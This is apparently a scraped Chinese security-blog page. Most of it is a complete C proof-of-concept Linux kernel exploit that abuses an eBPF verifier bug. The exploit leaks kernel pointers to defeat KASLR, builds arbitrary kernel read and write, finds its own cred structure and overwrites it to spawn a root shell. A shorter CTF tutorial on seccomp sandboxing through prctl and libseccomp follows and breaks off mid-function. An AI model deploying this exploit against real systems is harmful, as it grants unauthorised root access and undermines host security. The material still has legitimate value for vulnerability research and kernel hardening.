    union bpf_attr attr;

    /* Zero the whole union explicitly; a designated initializer does not
     * guarantee that bytes outside the initialized member are cleared. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t) key;

    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

/*
 * Fetch the key following `key` through BPF_MAP_GET_NEXT_KEY.
 *
 * map_fd  map file descriptor
 * key     pointer to the current key
 * value   buffer receiving the next key (passed as attr.next_key)
 *
 * Returns whatever bpf() returns for BPF_MAP_GET_NEXT_KEY.
 */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* Zero the whole union explicitly; a designated initializer does not
     * guarantee that bytes outside the initialized member are cleared. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t)(uintptr_t) key;
    attr.next_key = (uint64_t)(uintptr_t) value;

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
* @brief Run a bpf prog by attaching to a pair of sockets and sending packets
*
* The program is loaded as a socket filter, attached to one end of a UNIX
* datagram socket pair, and triggered by writing one 8-byte packet to the
* other end. All descriptors opened here are closed before returning.
*
* @param insns bpf program to be run
* @param insn_cnt number of bpf instructions
* @param log_level verifier log level forwarded to the program load
* @param print_log when non-zero, print the verifier log after a successful run
* @return int 0 for success, negative value for failure (the verifier log and
*         an error banner are printed on load/attach/send failures)
*/
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
             unsigned int print_log)
{
    static const char trigger_pkt[] = "11111111";
    const char *err_msg = NULL;
    int sock_fd[2], prog_fd;
    int ret;

    /* socket pair to trigger eBPF prog */
    ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
    if (ret < 0) {
        err_msg = "FAILED to creat socket pair!";
        goto err_socket;
    }

    /* start from an empty log so stale text is never printed */
    memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

    /* load bpf prog into kernel */
    prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
                            bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
    if (prog_fd < 0) {
        ret = prog_fd;
        err_msg = "FAILED to load bpf program!";
        goto err_bpf_load;
    }

    /* attach bpf prog to a socket */
    ret = setsockopt(sock_fd[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(int));
    if (ret < 0) {
        err_msg = "FAILED to attach the bpf program!";
        goto err_bpf_attach;
    }

    /* send a packet to trigger bpf; if the send itself fails the program
     * never ran, so report that instead of claiming success */
    if (write(sock_fd[1], trigger_pkt, sizeof(trigger_pkt) - 1) < 0) {
        ret = -1;
        err_msg = "FAILED to send the trigger packet!";
        goto err_bpf_attach;
    }

    /* output the log */
    if (print_log != 0) {
        puts(bpf_log_buf);
    }

    /* recycle resource */
    close(prog_fd);
    close(sock_fd[1]);
    close(sock_fd[0]);

    return 0;

err_bpf_attach:
    close(prog_fd);
err_bpf_load:
    puts(bpf_log_buf);
    close(sock_fd[1]);
    close(sock_fd[0]);
err_socket:
    err_print(err_msg);
    return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

#define MAKE_VULN_REG(__map_fd) \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
data = info.btf_id;
return data;
}

size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

/*
 * Build a modified copy of the map's ops table inside map element 1 and run
 * the MAKE_ARBITRARY_WRITE_OPS program.
 *
 * Steps:
 *   1. Copy sizeof(struct bpf_map_ops) bytes, 8 at a time, from map_ops_addr
 *      using read_arbitrary_addr().
 *   2. Replace the map_push_elem slot of the copy with
 *      ARRAY_MAP_GET_NEXT_KEY + kernel_offset.
 *   3. Store the copy in element 1 and the address of that copy
 *      (fake_ops_addr) in element 2.
 *   4. Run the program built from the macros (defined outside this block).
 *
 * Relies on the globals map_addr, map_ops_addr and kernel_offset having been
 * set by the caller. Every failure is fatal via err_exit().
 */
void make_arbitrary_write_ops(int map_fd){
    struct bpf_insn prog[] = {
        TRIGGER_VULN(map_fd),
        MAKE_VULN_REG(map_fd),
        MAKE_ARBITRARY_WRITE_OPS(map_fd),
        BPF_EXIT_INSN()};
    int key;
    size_t per_ops_ptr, value[0x1000], value_idx;
    struct bpf_map_ops *ops_data;

    /*
     * main() computes map_addr as (leaked pointer - 0x110), so
     * map_addr + 0x110 + MAP_SIZE is one MAP_SIZE past that leaked pointer.
     * NOTE(review): presumably the kernel address of element 1 -- confirm
     * against LEAK_MAP_ADDR and the map's value_size.
     */
    fake_ops_addr = map_addr + 0x110 + MAP_SIZE;

    /* Read the ops table one pointer at a time. */
    value_idx = 0;
    for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
        per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
        value[value_idx++] = per_ops_ptr;
    }

    /* Patch a single slot of the copy, then store the copy in element 1. */
    ops_data = (struct bpf_map_ops *)value;
    ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
    key = 1;
    if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
        err_exit("FAILED to load value into map!");
    }

    /* Element 2 carries the address of the copy for the program to pick up. */
    key = 2;
    value[0] = fake_ops_addr;
    if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
        err_exit("FAILED to load value into map!");
    }

    /* Previously the result was ignored; report a failed run explicitly. */
    if (run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0) < 0){
        err_exit("FAILED to run bpf prog!");
    }
}

/*
 * print_hex - dump a buffer to stdout, one machine word per row.
 * @p:    start of the buffer
 * @size: number of bytes to dump; must be a non-negative multiple of
 *        sizeof(void *)
 *
 * Each row shows the byte offset, eight individual bytes and the same memory
 * interpreted as one unsigned long. The row layout assumes 8-byte words.
 *
 * Returns 0 on success, 1 if the arguments are rejected (negative or
 * unaligned size, or a NULL buffer with a non-zero size). Nothing is printed
 * when the arguments are rejected.
 */
int print_hex(void *p, int size){
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if (size < 0 || (size_t)size % sizeof(void *)){
        return 1;
    }
    if (buf == NULL && size > 0){
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += (int)sizeof(void *)){
        unsigned long word;

        /* memcpy avoids the aliasing/alignment problems of casting buf to unsigned long *. */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               (unsigned int)i, buf[i+0], buf[i+1], buf[i+2], buf[i+3],
               buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Driver for the proof-of-concept. Stages, in order:
 *   1. create an array map and seed element 0;
 *   2. run LEAK_MAP_OPS and derive kernel_offset from the leaked ops pointer;
 *   3. run LEAK_MAP_ADDR and derive map_addr;
 *   4. walk the task list with read_arbitrary_addr() until the entry whose
 *      name matches the one set via PR_SET_NAME is found;
 *   5. call make_arbitrary_write_ops(), issue eight map updates whose flags
 *      argument is an address inside the cred structure, then call
 *      get_root_shell().
 * The macros, helpers and offsets used here are defined outside this block.
 */
int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

/* NOTE(review): arguments are presumably (type, key_size, value_size, max_entries) -- confirm against the wrapper. */
map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

/* Seed element 0 with a zero in its first word. */
key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

/* Stage 2: the program leaves its result in element 1, read back below. */
puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

/* Slide between the leaked pointer and its compile-time address ARRAY_MAP_OPS. */
kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

/* Stage 3: note that this program does not include MAKE_VULN_REG. */
puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
/* NOTE(review): 0x110 is presumably the offset of the value area inside the map object -- confirm. */
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

/* Stage 4: start at INIT_TASK + 0x818 (presumably the task list node -- confirm offset). */
size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

/* Give this process a recognisable 8-character name to search for. */
prctl(PR_SET_NAME, "11111111");
/*
 * Follow the pointer stored at next_task, then compare the 8 bytes at
 * next_task + 0x2d0 with the name set above.
 * NOTE(review): the loop has no bound; it only ends when a match is found.
 */
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

/* Undo the 0x818 list-node offset to get the start of the structure. */
current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

/* Stage 5: install the modified ops table. */
make_arbitrary_write_ops(map_fd);

/*
 * Eight updates; the flags argument is an address stepping in 4-byte
 * increments from current_cred + 4, and the first value word is all ones.
 * NOTE(review): presumably each call ends up in the patched map_push_elem
 * slot and stores to that address -- confirm against the kernel helper.
 */
key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}

沙盒基础知识

在 CTF 的 pwn 题中一般有两种函数调用方式实现沙盒机制:

使用 prctl 系统调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>
#include<linux/bpf.h>
#include<sys/types.h>

/*
 * Demo: install a seccomp filter through prctl() and then attempt execve.
 * The filter below is the one shown in the disassembly that follows this
 * listing in the article.
 */
int main(){
struct sock_filter filter[]={
/* 0: A = 32-bit word at offset 0 of the seccomp data (the syscall number) */
BPF_STMT(BPF_LD|BPF_W|BPF_ABS, 0),
/* 1: if A == 59 (execve) skip one instruction, landing on the ERRNO return */
BPF_JUMP(BPF_JMP|BPF_JEQ, 59, 1, 0),
/* 2: A >= 0 always holds, so skip one instruction, landing on the ALLOW return */
BPF_JUMP(BPF_JMP|BPF_JGE, 0, 1, 0),
/* 3: fail the syscall (SECCOMP_RET_ERRNO with no errno value OR-ed in) */
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ERRNO),
/* 4: let the syscall through */
BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
};
struct sock_fprog prog={
.len=sizeof(filter)/sizeof(filter[0]),
.filter=filter,
};
/* Set no_new_privs first, then install the filter; return values are not checked. */
prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0);
prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog);
/* Syscall 59 is the one the filter singles out. */
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0003
0002: 0x35 0x01 0x00 0x00000000 if (A >= 0x0) goto 0004
0003: 0x06 0x00 0x00 0x00050000 return ERRNO(0)
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW

使用 seccomp 库函数:

1
2
3
4
5
6
7
8
9
10
11
12
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

/*
 * Demo: the same sandbox built with the seccomp library instead of raw
 * prctl() calls. Return values are not checked.
 */
int main(void){
scmp_filter_ctx ctx;
/* Default action: allow every syscall. */
ctx = seccomp_init(SCMP_ACT_ALLOW);
/* Exception: kill on execve, with no argument conditions (last argument 0). */
seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
/* Load the filter into the kernel. */
seccomp_load(ctx);
/* Syscall 59 (execve) is the one the rule targets. */
syscall(59,"/bin/sh",NULL,NULL);
return 0;
}
1
2
3
4
5
6
7
8
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • 对 seccomp_load 函数进行逆向分析,可以发现其底层也是使用 prctl 系统调用
1
v17 = prctl(38LL, 1LL, 0LL, 0LL, 0LL); /* PR_SET_NO_NEW_PRIVS */
1
v14 = prctl(22LL, 2LL, v10, v10, v7); /* PR_SET_SECCOMP */

prctl 系统调用

prctl(process control,进程控制)是 Linux 提供的一个系统调用,可以对调用进程(线程)进行各种管理和控制操作

prctl 提供了对进程的许多控制和设置,使用第一个参数来指定其功能:

  • 设置进程的权限级别
  • 设置进程的调度参数
  • 设置进程的内存限制
  • 设置进程的 CPU 时间限制
  • 设置进程的信号处理
  • 设置进程的资源限制
  • 设置进程的属性
  • 获取进程的属性

沙盒需要的 prctl 功能如下:

  • prctl(PR_SET_NO_NEW_PRIVS):设置 no_new_privs 标志,保证此后 execve 不会赋予进程新的权限(该标志会被子进程继承且无法取消);设置之后,即使进程在其用户命名空间内没有 CAP_SYS_ADMIN 权限,也可以安装 seccomp 过滤器
  • prctl(PR_SET_SECCOMP):第二个参数是设置的过滤模式,第三个参数是设置的过滤规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
/*
 * prctl() system call (excerpt; "......" marks code the article left out).
 * Only the two options used when setting up a seccomp sandbox are shown.
 */
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
struct task_struct *me = current;
unsigned char comm[sizeof(me->comm)];
long error;

/* The security hook goes first; any result other than -ENOSYS is returned as-is. */
error = security_task_prctl(option, arg2, arg3, arg4, arg5);
if (error != -ENOSYS)
return error;

error = 0;
switch (option) {
......

case PR_SET_SECCOMP:
/* arg2 is passed as the seccomp mode, arg3 as the user-space pointer. */
error = prctl_set_seccomp(arg2, (char __user *)arg3);
break;

......

case PR_SET_NO_NEW_PRIVS:
/* Only the exact form (1, 0, 0, 0) is accepted. */
if (arg2 != 1 || arg3 || arg4 || arg5)
return -EINVAL;

task_set_no_new_privs(current);
break;

......

default:
error = -EINVAL;
break;
}
return error;
}

核心函数 prctl_set_seccomp 的调用链如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * Translate the prctl()-style seccomp mode into a do_seccomp() operation.
 * Returns -EINVAL for any mode other than STRICT or FILTER; otherwise
 * returns whatever do_seccomp() returns (flags are always 0 on this path).
 */
long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
unsigned int op;
void __user *uargs;

switch (seccomp_mode) {
case SECCOMP_MODE_STRICT: /* strict mode: no user argument is passed on */
op = SECCOMP_SET_MODE_STRICT;
uargs = NULL;
break;
case SECCOMP_MODE_FILTER: /* filter mode: the user-supplied filter is passed on */
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}

return do_seccomp(op, 0, uargs);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Dispatch a seccomp operation to its handler.
 * Every operation except SECCOMP_SET_MODE_FILTER requires flags == 0;
 * strict mode additionally requires a NULL uargs. Unknown operations and
 * violated preconditions yield -EINVAL.
 */
static long do_seccomp(unsigned int op, unsigned int flags,
void __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT: /* strict mode */
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER: /* filter mode */
return seccomp_set_mode_filter(flags, uargs);
case SECCOMP_GET_ACTION_AVAIL: /* query whether a given action is supported by the kernel */
if (flags != 0)
return -EINVAL;

return seccomp_get_action_avail(uargs);
case SECCOMP_GET_NOTIF_SIZES: /* query the sizes used by the seccomp notification interface */
if (flags != 0)
return -EINVAL;

return seccomp_get_notif_sizes(uargs);
default:
return -EINVAL;
}
}

这里我们重点分析过滤模式的 seccomp_set_mode_filter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
/*
 * Install a user-supplied seccomp filter on the current task (excerpt;
 * "......" marks code the article left out).
 *
 * On success returns 0, or the new listener fd when
 * SECCOMP_FILTER_FLAG_NEW_LISTENER was requested; on failure returns a
 * negative errno. The prepared filter is freed on every path except a
 * successful attach, where the local pointer is cleared first.
 */
static long seccomp_set_mode_filter(unsigned int flags,
const char __user *filter)
{
const unsigned long seccomp_mode = SECCOMP_MODE_FILTER;
struct seccomp_filter *prepared = NULL;
long ret = -EINVAL;
int listener = -1;
struct file *listener_f = NULL;

......

prepared = seccomp_prepare_user_filter(filter); /* prepare the new filter before taking any locks */
if (IS_ERR(prepared))
return PTR_ERR(prepared);

if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
listener = get_unused_fd_flags(O_CLOEXEC);
if (listener < 0) {
ret = listener;
goto out_free;
}

listener_f = init_listener(prepared); /* create the listener file for this filter */
if (IS_ERR(listener_f)) {
put_unused_fd(listener);
ret = PTR_ERR(listener_f);
goto out_free;
}
}

if (flags & SECCOMP_FILTER_FLAG_TSYNC &&
mutex_lock_killable(&current->signal->cred_guard_mutex))
goto out_put_fd;

spin_lock_irq(&current->sighand->siglock);

if (!seccomp_may_assign_mode(seccomp_mode))
goto out;

if (has_duplicate_listener(prepared)) { /* fails with -EBUSY when a duplicate listener is detected */
ret = -EBUSY;
goto out;
}

ret = seccomp_attach_filter(flags, prepared); /* attach the prepared filter */
if (ret)
goto out;
/* Do not free the successfully attached filter. */
prepared = NULL;

seccomp_assign_mode(current, seccomp_mode, flags); /* put the current task into filter mode */
out:
spin_unlock_irq(&current->sighand->siglock);
if (flags & SECCOMP_FILTER_FLAG_TSYNC)
mutex_unlock(&current->signal->cred_guard_mutex);
out_put_fd:
if (flags & SECCOMP_FILTER_FLAG_NEW_LISTENER) {
if (ret) {
listener_f->private_data = NULL;
